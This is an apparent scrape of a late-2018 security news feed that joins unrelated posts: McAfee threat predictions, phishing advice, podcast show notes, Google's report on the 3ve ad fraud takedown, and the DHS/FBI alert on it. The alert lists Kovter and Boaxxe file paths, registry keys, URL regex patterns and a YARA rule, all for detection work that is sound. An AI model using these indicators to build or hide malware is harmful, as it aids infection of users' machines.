This year we have seen cyber threats adapt and pivot faster than ever. We have seen ransomware evolving to be more effective or operate as a smoke screen. We have seen cryptojacking soar, as it provides a better, and safer, return on investment than ransomware. We can still see phishing going strong and finding new vulnerabilities to exploit. We also noticed fileless and “living off the land” threats are more slippery and evasive than ever, and we have even seen the incubation of steganography malware in the Pyeongchang Olympics campaign. In 2019, we predict attackers will more frequently combine these tactics to create multifaced, or synergistic, threats.

What could be worse?

Attacks are usually centered on the use of one threat. Bad actors concentrate their efforts on iterating and evolving one threat at a time for effectiveness and evasion. When an attack is successful, it is classified as ransomware, cryptojacking, data exfiltration, etc., and defenses are put in place. At this point, the attack’s success rate is significantly reduced. However, if a sophisticated attack involves not one but five top-notch threats synergistically working together, the defense panorama could become very blurry. The challenge arises when an attempt is made to identify and mitigate the attack. Because the ultimate attack goals are unknown, one might get lost in the details of each threat as it plays a role in the chain.

One of the reasons synergic threats are becoming a reality is because bad actors are improving their skills by developing foundations, kits, and reusable threat components. As attackers organize their efforts into a black-market business model, they can focus on adding value to previous building blocks. This strategy allows them to orchestrate multiple threats instead of just one to reach their goals.

An example is worth a thousand words

Imagine an attack that starts with a phishing threat—not a typical campaign using Word documents, but a novel technique. This phishing email contains a video attachment. When you open the video, your video player does not play and prompts you to update the codec. Once you run the update, a steganographic polyglot file (a simple GIF) is deployed on your system. Because it is a polyglot (a file that conforms to more than one format at the same time), the GIF file schedules a task that fetches a fileless script hosted on a compromised system. That script running in memory evaluates your system and decides to run either ransomware or a cryptocurrency miner. That is a dangerous synergistic threat in action.

The attack raises many questions: What are you dealing with? Is it phishing 2.0? Is it stegware? Is it fileless and “living off the land”? Cryptojacking? Ransomware? It is everything at the same time.

This sophisticated but feasible example demonstrates that focusing on one threat may not be enough to detect or remediate an attack. When you aim to classify the attack into a single category, you might lose the big picture and thus be less effective mitigating it. Even if you stop the attack in the middle of the chain, discovering the initial and final stages is as important for protecting against future attempts.

Be curious, be creative, connect your defenses

Tackling sophisticated attacks based on synergic threats requires questioning every threat. What if this ransomware hit was part of something bigger? What if this phishing email pivots to a technique that employees are not trained for? What if we are missing the real goal of the attack?

Bearing these questions in mind will not only help capture the big picture, but also get the most of security solutions. We predict bad actors will add synergy to their attacks, but cyber defenses can also work synergistically.

Cybercriminals to Use Social Media Misinformation, Extortion Campaigns to Challenge Organizations’ Brands

The elections were influenced, fake news prevails, and our social media followers are all foreign government–controlled bots. At least that’s how the world feels sometimes. To say recent years have been troubled for social media companies would be an understatement. During this period a game of cat and mouse has ensued, as automated accounts are taken down, adversaries tactics evolve, and botnet accounts emerge looking more legitimate than ever before. In 2019, we predict an increase of misinformation and extortion campaigns via social media that will focus on brands and originate not from nation-state actors but from criminal groups.

Nation-states leverage bot battalions to deliver messages or manipulate opinion, and their effectiveness is striking. Bots often will take both sides of a story to spur debate, and this tactic works. By employing a system of amplifying nodes, as well as testing the messaging (including hashtags) to determine success rates, botnet operators demonstrate a real understanding of how to mold popular opinion on critical issues.

In one example, an account that was only two weeks old with 279 followers, most of which were other bots, began a harassment campaign against an organization. By amplification, the account generated an additional 1,500 followers in only four weeks by simply tweeting malicious content about their target.

Activities to manipulate public opinion have been well documented and bots well versed in manipulating conversations to drive agendas stand ready. Next year we expect that cybercriminals will repurpose these campaigns to extort companies by threatening to damage their brands. Organizations face a serious danger.

Data Exfiltration Attacks to Target the Cloud

In the past two years, enterprises have widely adopted the Software-as-a-Service model, such as Office 365, as well as Infrastructure- and Platform-as-a-Service cloud models, such as AWS and Azure. With this move, far more corporate data now resides in the cloud. In 2019, we expect a significant increase in attacks that follow the data to the cloud.

With the increased adoption of Office 365, we have noticed a surge of attacks on the service— especially attempts to compromise email. One threat the McAfee cloud team uncovered was the botnet KnockKnock, which targeted system accounts that typically do not have multifactor authentication. We have also seen the emergence of exploits of the trust model in the Open Authorization standard. One was launched by Fancy Bear, the Russian cyber espionage group, phishing users with a fake Google security app to gain access to user data.

Similarly, during the last couple of years we have seen many high-profile data breaches attributed to misconfigured Amazon S3 buckets. This is clearly not the fault of AWS. Based on the shared responsibility model, the customer is on the hook to properly configure IaaS/PaaS infrastructure and properly protect their enterprise data and user access. Complicating matters, many of these misconfigured buckets are owned by vendors in their supply chains, rather than by the target enterprises. With access to thousands of open buckets and credentials, bad actors are increasingly opting for these easy pickings.

McAfee has found that 21% of data in the cloud is sensitive—such as intellectual property, and customer and personal data—according to the McAfee Cloud Adoption and Risk Report. With a 33% increase in users collaborating on this data during the past year, cybercriminals know how to seek more targets:

  • Cloud-native attacks targeting weak APIs or ungoverned API endpoints to gain access to the data in SaaS as well as in PaaS and serverless workloads
  • Expanded reconnaissance and exfiltration of data in cloud databases (PaaS or custom applications deployed in IaaS) expanding the S3 exfiltration vector to structured data in databases or data lakes
  • Leveraging the cloud as a springboard for cloud-native man-in-the-middle attacks (such as GhostWriter, which exploits publicly writable S3 buckets introduced due to customer misconfigurations) to launch cryptojacking or ransomware attacks into other variants of MITM attacks.

Voice-Controlled Digital Assistants the Next Vector in Attacking IoT Devices

As tech fans continue to fill their homes with smart gadgets, from plugs to TVs, coffee makers to refrigerators, and motion sensors to lighting, the means of gaining entry to a home network are growing rapidly, especially given how poorly secured many IoT devices remain.

But the real key to the network door next year will be the voice-controlled digital assistant, a device created in part to manage all the IoT devices within a home. As sales increase—and an explosion in adoption over the holiday season looks likely—the attraction for cybercriminals to use assistants to jump to the really interesting devices on a network will only continue to grow.

For now, the voice assistant market is still taking shape, with many brands still looking to dominate the market, in more ways than one, and it is unclear whether one device will become ubiquitous. If one does take the lead, its security features will quite rightly fall under the microscope of the media, though not perhaps before its privacy concerns have been fully examined in prose.

(Last year we highlighted privacy as the key concern for home IoT devices. Privacy will continue to be a concern, but cybercriminals will put more effort into building botnets, demanding ransoms, and threatening the destruction of property of both homes and businesses).

This opportunity to control a home’s or office’s devices will not go unnoticed by cybercriminals, who will engage in an altogether different type of writing in relation to the market winner, in the form of malicious code designed to attack not only IoT devices but also the digital assistants that are given so much license to talk to them.

Smartphones have already served as the door to a threat. In 2019, they may well become the picklock that opens a much larger door. We have already seen two threats that demonstrate what cybercriminals can do with unprotected devices, in the form of the Mirai botnet, which first struck in 2016, and IoT Reaper, in 2017. These IoT malware appeared in many variants to attack connected devices such as routers, network video recorders, and IP cameras. They expanded their reach by password cracking and exploiting known vulnerabilities to build worldwide robot networks.

Next year we expect to see two main vectors for attacking home IoT devices: routers and smartphones/ tablets. The Mirai botnet demonstrated the lack of security in routers. Infected smartphones, which can already monitor and control home devices, will become one of the top targets of cybercriminals, who will employ current and new techniques to take control.

Malware authors will take advantage of phones and tablets, those already trusted controllers, to try to take over IoT devices by password cracking and exploiting vulnerabilities. These attacks will not appear suspicious because the network traffic comes from a trusted device. The success rate of attacks will increase, and the attack routes will be difficult to identify. An infected smartphone could cause the next example of hijacking the DNS settings on a router. Vulnerabilities in mobile and cloud apps are also ripe for exploitation, with smartphones at the core of the criminals’ strategy.

Infected IoT devices will supply botnets, which can launch DDoS attacks, as well as steal personal data. The more sophisticated IoT malware will exploit voice-controlled digital assistants to hide its suspicious activities from users and home-network security software. Malicious activities such as opening doors and connecting to control servers could be triggered by user voice commands (“Play music” and “What is today’s weather?”). Soon we may hear infected IoT devices themselves exclaiming: “Assistant! Open the back door!”

Cybercriminals to Increase Attacks on Identity Platforms and Edge Devices Under Siege

Large-scale data breaches of identity platforms—which offer centralized secure authentication and authorization of users, devices, and services across IT environments—have been well documented in 2018. Meanwhile, the captured data is being reused to cause further misery for its victims. In 2019, we expect to see large-scale social media platforms implement additional measures to protect customer information. However, as the platforms grow in numbers, we predict criminals will further focus their resources on such attractive, data-rich environments. The struggle between criminals and big-scale platforms will be the next big battleground.

Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

HideIPVPN review: Great if you need a speedy connection via Germany

HideIPVPN in brief:

  • P2P allowed: Yes, on select servers
  • Business location: USA and Moldova
  • Number of servers: 29
  • Number of country locations: 11
  • Cost: $70 (billed annually)
  • VPN protocol: OpenVPN
  • Data encryption: AES-256
  • Data authentication: SHA 256
  • Handshake encryption: RSA 2048

Editor’s Note: This review was updated on November 7, 2018 to reflect changes to the HideIPVPN desktop app for Windows, improved speed scores, and a change to the review score.

To read this article in full, please click here

Malcom – Malware Communication Analyzer

Malcom – Malware Communication Analyzer

Malcom is a Malware Communication Analyzer designed to analyze a system’s network communication using graphical representations of network traffic, and cross-reference them with known malware sources.

This comes handy when analyzing how certain malware species try to communicate with the outside world.

Malcom Malware Communication Analyzer Features

Malcom can help you:

  • Detect central command and control (C&C) servers
  • Understand peer-to-peer networks
  • Observe DNS fast-flux infrastructures
  • Quickly determine if a network artifact is ‘known-bad’

The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network.

Read the rest of Malcom – Malware Communication Analyzer now! Only available at Darknet.

The Spotify Phishing Scam: How to Reel in This Cyberthreat

Many music-lovers around the world use Spotify to stream all of their favorite tunes. While the music streaming platform is a convenient tool for users to download and listen to their music, hackers are capitalizing on the company’s popularity with a recent phishing campaign. The campaign lures users into giving up their account details, putting innocent Spotify customers’ credentials at risk.

So, how are the account hijackers conducting these phishing attacks? The campaign sends listeners fraudulent emails that appear to be from Spotify, prompting them to confirm their account details. However, the link contained in the email is actually a phishing link. When the user clicks on it, they are redirected to a phony Spotify website where they are prompted to enter their username and password for the hacker’s disposal.

This phishing campaign can lead to a variety of other security risks for victims exposed to the threat. For example, many users include their birthday or other personal information in their password to make it easier to remember. If a hacker gains access to a user’s Spotify password, they are given a glance into the victim’s password creation mindset, which could help them breach other accounts belonging to the user.

Fortunately, there are multiple steps users can take to avoid the Spotify phishing campaign and threats like it. Check out the following tips:

  • Create complex passwords. If a hacker gains access to a victim’s username and password, they will probably analyze these credentials to determine how the victim creates their passwords. It’s best to create passwords that don’t include personal information, such as your birthday or the name of your pet.
  • Avoid reusing passwords. If victims reuse the same password for multiple accounts, this attack could allow cybercriminals to breach additional services and platforms. To prevent hackers from accessing other accounts, create unique usernames and passwords for each online platform you use.
  • Look out for phishing red flags. If you notice that the “from” address in an email is a little sketchy or an unknown source, don’t interact with the message. And if you’re still unsure of whether the email is legitimate or not, hover your mouse over the button prompting you to click on the link (but don’t actually click on it). If the URL preview doesn’t seem to be related to the company, it is most likely a phishing email.
  • Be skeptical of emails claiming to come from legitimate companies. If you receive an email asking to confirm your login credentials, go directly to the company’s website. You should be able to check the status of your account on the company website or under the settings portion of the Spotify app to determine the legitimacy of the request.
  • Use security software to surf the web safely. Make sure you use a website reputation tool like McAfee WebAdvisor to avoid landing on phishing and malicious sites.

And, as always, to stay on top of the latest and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?and ‘Like’ us on Facebook.

The post The Spotify Phishing Scam: How to Reel in This Cyberthreat appeared first on McAfee Blogs.

Understanding & Preventing Advanced Persistent Threats (APTs)

A guide to advanced persistent threats (APTs), a highly sophisticated, highly destructive form of cyber attack. What is an Advanced Persistent Threat (APT)? “Advanced persistent threat” is a broad term used to describe a cyber attack where hackers covertly gain access to a system and remain inside it, undetected, for a significant period of time… Read More

The post Understanding & Preventing Advanced Persistent Threats (APTs) appeared first on .

AutoCAD Malware – Computer Aided Theft

Computer aided design (CAD) has played a vital role in the past decades building our technology-driven society, helping structures and engineering reach new levels of complexity – designing a building such as the Burj Khalifa by hand would be difficult if not impossible.

Of course, where valuable documents are stored electronically, malware is typically never far behind and,

Risky Business #522 — Alex Stamos co-hosts the show, reflects on Snowden disclosures

We’ve got a slightly different edition of the show this week – Alex Stamos is filling in for Adam Boileau this week in the news slot.

Most of you know him as Facebook’s recently departed chief security officer. Alex also served as the CSO at Yahoo for a time, but his security career stretches back a long way. He co-founded iSEC Partners back in 2004, and before that he did some time with @Stake.

The @Stake mafia is everywhere.

These days Alex is an adjunct professor at Stanford University. He joined me to talk about the week’s security news, as well as to have a chat about the Edward Snowden disclosures, five years on.

This week’s show is brought to you by Thinkst Canary, big thanks to them for that. And instead of one of their staff being on the show this week in the sponsor chair, they asked me to interview this week’s sponsor guest, their customer, Mike Ruth, a security engineer with Cruise Automation.

Mike did a presentation at a conference called QCon recently all about automating the deployment of canary tokens at scale using some nifty CI/CD tricks. He’ll be joining us after the news to tell us all about that.

Items discussed in this week’s news:

  • NSO Group busted to selling to Saudi Arabia
  • NSO malware targets Mexican journalists
  • Edward Snowden claims NSO connection in Khashoggi case
  • Australia’s AA Bill latest
  • npm supply-chain attack targets Bitcoiners
  • Guardian reports Manafort met Assange, denials, lawsuits flying already
  • UK parliament seizes Facebook documents
  • Uber fined over 2016 breach coverup
  • UK cops decline to charge bug reporter
  • USPS finally fixes data exposure after Krebs intervention
  • Rowhammer attack bypasses ECC protections
  • Bloomberg is investigating its own reporting on Supermicro
  • Magecart is everywhere
  • Google, Mozilla plan browser access to file systems

Links to everything that we discussed are below and you can follow Patrick or Alex on Twitter if that’s your thing.

Show notes

Israeli hacking firm NSO Group offered Saudis cellphone spy tools - report | The Times of Israel
Edward Snowden: Israeli spyware was used to track and eventually kill Jamal Khashoggi | Business Insider
A Journalist Was Killed in Mexico. Then His Colleagues Were Hacked. - The New York Times
Home Affairs attempts to allay concerns about Australian exporters for encryption-busting Bill | ZDNet
Widely used open source software contained bitcoin-stealing backdoor | Ars Technica
I don't know what to say. · Issue #116 · dominictarr/event-stream · GitHub
Manafort held secret talks with Assange in Ecuadorian embassy, sources say | US news | The Guardian
UK parliament seizes cache of internal Facebook documents to further privacy probe | TechCrunch
Uber fined $1.17 million by U.K., Dutch authorities for 2016 breach
UK cops won't go after researcher who reported security issue to York city officials | ZDNet
USPS Site Exposed Data on 60 Million Users — Krebs on Security
Potentially disastrous Rowhammer bitflips can bypass ECC protections | Ars Technica
Bloomberg is still reporting on challenged story regarding China hardware hack - The Washington Post
Magecart group hilariously sabotages competitor | ZDNet
Amazon admits it exposed customer email addresses, but refuses to give details | TechCrunch
Google, Mozilla working on letting web apps edit files despite warning it could be 'abused in terrible ways' - TechRepublic
Germany proposes router security guidelines | ZDNet
Half of all Phishing Sites Now Have the Padlock — Krebs on Security
The Snowden Legacy, part one: What’s changed, really? | Ars Technica
QConSF18 - Canaries - Google Drive
Canary — know when it matters

Industry collaboration leads to takedown of the “3ve” ad fraud operation



For years, Google has been waging a comprehensive, global fight against invalid traffic through a combination of technology, policy, and operations teams to protect advertisers and publishers and increase transparency throughout the advertising industry.

Last year, we identified one of the most complex and sophisticated ad fraud operations we have seen to date, working with cyber security firm White Ops, and referred the case to law enforcement. Today, the U.S. Attorney’s Office for the Eastern District of New York announced criminal charges associated with this fraud operation. This takedown marks a major milestone in the industry’s fight against ad fraud, and we’re proud to have been a key contributor.

In partnership with White Ops, we have published a white paper about how we identified this ad fraud operation, the steps we took to protect our clients from being impacted, and the technical work we did to detect patterns across systems in the industry. Below are some of the highlights from the white paper, which you can download here.

All about 3ve: A creative and sophisticated threat

Referred to as 3ve (pronounced “Eve”), this ad fraud operation evolved over the course of 2017 from a modest, low-level botnet into a large and sophisticated operation that used a broad set of tactics to commit ad fraud. 3ve operated on a significant scale: At its peak, it controlled over 1 million IPs from both residential malware infections and corporate IP spaces primarily in North America and Europe.

Through our investigation, we discovered that 3ve was comprised of three unique sub-operations that evolved rapidly, using sophisticated tactics aimed at exploiting data centers, computers infected with malware, spoofed fraudulent domains, and fake websites. Through its varied and complex machinery, 3ve generated billions of fraudulent ad bid requests (i.e., ad spaces on web pages that advertisers can bid to purchase in an automated way), and it also created thousands of spoofed fraudulent domains. It should be noted that our analysis of ad bid requests indicated growth in activity, but not necessarily growth in transactions that would result in charges to advertisers. It’s also worth noting that 3+ billion daily ad bid requests made 3ve an extremely large ad fraud operation, but its bid request volume was only a small percentage of overall bid request volume across the industry.
Our objective

Trust and integrity are critical to the digital advertising ecosystem. Investments in our ad traffic quality systems made it possible for us to tackle this ad fraud operation and to limit the impact it had on our clients as quickly as possible, including crediting advertisers.

3ve’s focus, like many ad fraud schemes, was not a single player or system, but rather the whole advertising ecosystem. As we worked to protect our ad systems against traffic from this threat, we identified that others also had observed this traffic, and we partnered with them to help remove the threat from the ecosystem. The working group, which included nearly 20 partners, was a key component that shaped our broader investigation into 3ve, enabling us to engage directly with each other and to work towards a mutually beneficial outcome.
Industry collaboration helps bring 3ve down

While ad fraud traditionally has been seen as a faceless crime in which bad actors don’t face much risk of being identified or consequences for their actions, 3ve’s takedown demonstrates that there are risks and consequences to committing ad fraud. We’re confident that our collective efforts are building momentum and moving us closer to finding a resolution to this challenge.

For example, industry initiatives such as the Interactive Advertising Bureau (IAB) Tech Lab’s ads.txt standard, which has experienced and continues to see very rapid adoption (over 620,000 domains have an ads.txt), as well as the increasing number of buy-side platforms and exchanges offering refunds for invalid traffic, are valuable steps towards cutting off the money flow to fraudsters. As we announced last year, we’ve made, and will continue to make investments in our automated refunds for invalid traffic, including our work with supply partners to provide advertisers with refunds for invalid traffic detected up to 30 days after monthly billing.

Industry bodies such as the IAB, Trustworthy Accountability Group (TAG), Media Rating Council, and the Joint Industry Committee for Web Standards, who are serving as agents of change and collaboration across our industry, are instrumental in the fight against ad fraud. We have a long history of working with these bodies, including ongoing participation in TAG and IAB leadership and working groups, as well as our inclusion in the TAG Certified Against Fraud program. That program’s value was reinforced with the IAB’s requirement that all members need to be TAG certified by the middle of this year.


Successful disruption

A coordinated takedown of infrastructure related to 3ve’s operations occurred recently. The takedown involved disrupting as much of the related infrastructure as possible to make it hard to rebuild any of 3ve’s operations. As the graph below demonstrates, declining volumes in invalid traffic indicate that the disruption thus far has been successful, bringing the bid request traffic close to zero within 18 hours of starting the coordinated takedown.
Looking ahead

We’ll continue to be vigilant, working to protect marketers, publishers, and users, while continuing to collaborate with the broader industry to safeguard the integrity of the digital advertising ecosystem that powers the open web. Our work to take down 3ve is another example of our collaboration with the broader ecosystem to improve trust in digital advertising. We are committed to helping to create a better digital advertising ecosystem — one that is more valuable, transparent, and trusted for everyone.

TA18-331A: 3ve – Major Online Ad Fraud Operation

Original release date: November 27, 2018

Systems Affected

Microsoft Windows

Overview

This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). DHS and FBI are releasing this TA to provide information about a major online ad fraud operation—referred to by the U.S. Government as "3ve"—involving the control of over 1.7 million unique Internet Protocol (IP) addresses globally, when sampled over a 10-day window.

Description

Online advertisers desire premium websites on which to publish their ads and large numbers of visitors to view those ads. 3ve created fake versions of both (websites and visitors), and funneled the advertising revenue to cyber criminals. 3ve obtained control over 1.7 million unique IPs by leveraging victim computers infected with Boaxxe/Miuref and Kovter malware, as well as Border Gateway Protocol-hijacked IP addresses. 

Boaxxe/Miuref Malware

Boaxxe malware is spread through email attachments and drive-by downloads. The ad fraud scheme that utilizes the Boaxxe botnet is primarily located in a data center. Hundreds of machines in this data center are browsing to counterfeit websites. When these counterfeit webpages are loaded into a browser, requests are made for ads to be placed on these pages. The machines in the data center use the Boaxxe botnet as a proxy to make requests for these ads. A command and control (C2) server sends instructions to the infected botnet computers to make the ad requests in an effort to hide their true data center IPs.

Kovter Malware

Kovter malware is also spread through email attachments and drive-by downloads. The ad fraud scheme that utilizes the Kovter botnet runs a hidden Chromium Embedded Framework (CEF) browser on the infected machine that the user cannot see. A C2 server tells the infected machine to visit counterfeit websites. When the counterfeit webpage is loaded in the hidden browser, requests are made for ads to be placed on these counterfeit pages. The infected machine receives the ads and loads them into the hidden browser.

Impact

For the indicators of compromise (IOCs) below, keep in mind that any one indicator on its own may not necessarily mean that a machine is infected. Some IOCs may be present for legitimate applications and network traffic as well, but are included here for completeness.

Boaxxe/Miuref Malware

Boaxxe malware leaves several executables on the infected machine. They may be found in one or more of the following locations:

  • %UserProfile%\AppData\Local\VirtualStore\lsass.aaa
  • %UserProfile%\AppData\Local\Temp\<RANDOM>.exe
  • %UserProfile%\AppData\Local\<Random eight-character folder name>\<original file name>.exe

The HKEY_CURRENT_USER (HKCU) “Run” key is set to the path to one of the executables created above.

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Run\<Above path to executable>\

Kovter Malware

Kovter malware is found mostly in the registry, but the following files may be found on the infected machine:

  • %UserProfile\AppData\Local\Temp\<RANDOM> .exe/.bat
  • %UserProfile%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\<RANDOM>\<RANDOM FILENAME>.exe
  • %UserProfile%\AppData\Local\<RANDOM>\<RANDOM>.lnk
  • %UserProfile%\AppData\Local\<RANDOM>\<RANDOM>.bat

Kovter is known to hide in the registry under:

  • HKCU\SOFTWARE\<RANDOM>\<RANDOM>

The customized CEF browser is dropped to:

  • %UserProfile%\AppData\Local\<RANDOM>

The keys will look like random values and contain scripts. In some values, a User-Agent string can be clearly identified. An additional key containing a link to a batch script on the hard drive may be placed within registry key:

  • HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

There are several patterns in the network requests that are made by Kovter malware when visiting the counterfeit websites. The following are regex rules for these URL patterns:

  • /?ptrackp=\d{5,8}
  • /feedrs\d/click?feed_id=\d{1,5}&sub_id=\d{1,5}&cid=[a-f0-9-]*&spoof_domain=[\w\.\d-_]*&land_ip=\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}
  • /feedrs\d/vast_track?a=impression&feed_id=\d{5}&sub_id=\d{1,5}&sub2_id=\d{1,5}&cid=[a-f\d-]

The following is a YARA rule for detecting Kovter:

rule KovterUnpacked {
  meta:
    desc = "Encoded strings in unpacked Kovter samples."
  strings:
    $ = "7562@3B45E129B93"
    $ = "@ouhKndCny"
    $ = "@ouh@mmEdctffdsr"
    $ = "@ouhSGQ"
  condition:
    all of them
}

Solution

If you believe you may be a victim of 3ve and its associated malware or hijacked IPs, and have information that may be useful to investigators, submit your complaint to www.ic3.gov and use the hashtag 3ve (#3ve) in the body of your complaint.

DHS and FBI advise users to take the following actions to remediate malware infections associated with Boaxxe/Miuref or Kovter:

  • Use and maintain antivirus software. Antivirus software recognizes and protects your computer against most known viruses. Security companies are continuously updating their software to counter these advanced threats. Therefore, it is important to keep your antivirus software up-to-date. If you suspect you may be a victim of malware, update your antivirus software definitions and run a full-system scan. (See Understanding Anti-Virus Software for more information.)
  • Avoid clicking links in email. Attackers have become very skilled at making phishing emails look legitimate. Users should ensure the link is legitimate by typing the link into a new browser. (See Avoiding Social Engineering and Phishing Attacks.)
  • Change your passwords. Your original passwords may have been compromised during the infection, so you should change them. (See Choosing and Protecting Passwords.)
  • Keep your operating system and application software up-to-date. Install software patches so that attackers cannot take advantage of known problems or vulnerabilities. You should enable automatic updates of the operating system if this option is available. (See Understanding Patches and Software Updates for more information.)
  • Use anti-malware tools. Using a legitimate program that identifies and removes malware can help eliminate an infection. Users can consider employing a remediation tool. A non-exhaustive list of examples is provided below. The U.S. Government does not endorse or support any particular product or vendor.

References

Revision History

  • November 27, 2018: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.


Happy National Day of Giving!

Today is National Day of Giving. How are you celebrating?

At Verisign, we did a quick search on NameStudioTM, our easy-to-use, domain name suggestion tool to see what interesting .com and .net domain names were available to register today … and here are some of our favorites!

AVAILABLE .COM AND .NET DOMAIN NAMES*

.COM

onekindaction.com
thesharingme.com
truegivingnow.com
philanthropyfamily.com
whatsmycharity.com
donatingwithheart.com
ourfavoritegift.com
servingofkindness.com
sharedgenerosity.com
realdifferencemaker.com

.NET

onekindaction.net
thesharingme.net
truegivingnow.net
philanthropyfamily.net
whatsmycharity.net
donatingwithheart.net
ourfavoritegift.net
servingofkindness.net
sharedgenerosity.net
realdifferencemaker.net

 

What’s yours?

Tell us what great .com and .net domain names you’ve found on NameStudio here.

And check back soon to see what day we’re celebrating next. Better yet, subscribe to the Verisign blog to have the posts delivered directly to your inbox.

Happy National Day of Giving!


*Available as of November 27, 2018

The user is solely responsible for ensuring that the registration of any domain name listed herein or based on NameStudio domain search data does not violate any third-party trademarks or other intellectual property.

The post Happy National Day of Giving! appeared first on Verisign Blog.

Retailers Fix Software Flaws Quickly, Despite Continued Code Quality Issues

Veracode State of Software Security 2018 Retail Industry

The 2018 holiday shopping season is off to a record-breaking start, thanks to consumers’ growing comfort with making online purchases and an increasing number of retailers offering Black Friday pricing starting on Thanksgiving. In fact, in the first two days of the shopping season, online retailers saw nearly $10 billion sales, with Adobe reporting that consumers in the U.S. alone spent $6.2 billion on Black Friday. For many, the ability to complete holiday shopping online and avoid crowded parking lots and throngs of people in a shopping center or mall is a relief. This may even trump any concerns they may have about privacy or fraud as they use credit cards and apps to make their purchases.

Retail’s State of Software Security Receives High Marks – Yet There’s More to be Done

The good news is Veracode’s State of Software Security Volume 9 (SOSS Vol. 9) found that retail is faster than most industries – second only to healthcare – when it comes to addressing common vulnerabilities found in software, thereby reducing risk exposure. Through our flaw persistence analysis, or how long a flaw lingers after first discovery, we found that the retail industry remediates a quarter of its vulnerabilities in 14 days, and 50 percent of flaws in 64 days. Retail outpaced the average fix speed at every interval across all industries, keeping consistent with its urgency to close vulnerabilities.

However, two-thirds (66 percent) of applications retailers use are at risk from information leakage attacks. This means that an application may reveal sensitive data that an attacker can then use to exploit the web application, its hosting network, or the user. Retail reported the third-most information leakage issues after technology and financial services. SOSS Vol. 9 also shows that the retail industry has the highest number of code quality flaws when compared to all other verticals at 65 percent. Code quality is the third most common vulnerability category across the board, following information leakage and cryptographic issues, suggesting that developing quality, secure code is an industry-wide issue for the retail sector.

“Vulnerabilities in applications can allow attackers seeking sensitive information such as consumer payment data a way in,” said Paul Farrington, Director of EMEA and APJ at Veracode. “Many retailers are showing an aptitude for remediating flaws quickly to help improve security and protect their high value information. This is promising, yet the persistence and prevalence of vulnerabilities that continues to plague retailers calls for both increased speed of fix and better prioritizing which flaws to fix first.”

Secure Software Development Education and the Skills Gap

It is estimated 3.5 million cybersecurity jobs will go unfilled by the year 2020. Our research shows 76 percent of developers say that security and secure development education is necessary – but not offered in current curriculums – so this hardly comes as a surprise. The onus falls on organizations such as retailers to ensure that their development teams are receiving the education necessary, and are equipped with the appropriate tooling, to make security a priority in the software development process.

As the retail industry offers new ways to buy, pick up, and ship goods, it is also increasing the threat landscape by producing a wider portfolio of web applications. It will be critical for them to ensure their developers have what they need to keep their systems and their customers’ sensitive information safe from potential cyber attacks.

To learn more about the retail industry’s security hygiene, download the free Retail Industry Infosheet.

2018 Cost of Data Breach vs. Cybersecurity Response Plans and Solutions

Data breaches cost businesses millions in damages and can seriously tarnish their reputation. Find out how to protect your enterprise from a costly breach with data security solutions and cyber threat intelligence.


Category:

Risk Management
Information Security

Data breaches cost businesses millions in damages and can seriously tarnish their reputation. Find out how to protect your enterprise from a costly breach with data security solutions and cyber threat intelligence.

Is a Laptop’s Password Enough to Keep it Secure?

It could happen to any of us. One minute your laptop is sitting on a coffeehouse table or going through airport security, the next it’s gone. Your personal files are all locked behind a strong password, but is that enough to keep off prying eyes?

In episode 19 of “Hackable?”, Geoff ships his laptop 1,000 miles to a white-hat hacker to investigate. Listen and learn if his password is enough, or if Geoff’s tax forms, social security number, and photos are compromised. 

Listen now to the award-winning podcast Hackable? on Apple Podcasts. You don’t want to miss this surprising episode.  


{
"metadata": {
"id": "c13802a4-5f6b-43cf-8c5b-e37549f1e59e",
"version": "1.0",
"ep": "ta",
"lang": "en-us",
"original-url": "https://securingtomorrow.mcafee.com/consumer/is-a-laptops-password-enough-to-keep-it-secure/",
"author": "Gary Davis",
"author-page": "https://securingtomorrow.mcafee.com/author/gary-davis/",
"category": "Consumer Threat Notices",
"draft": "false",
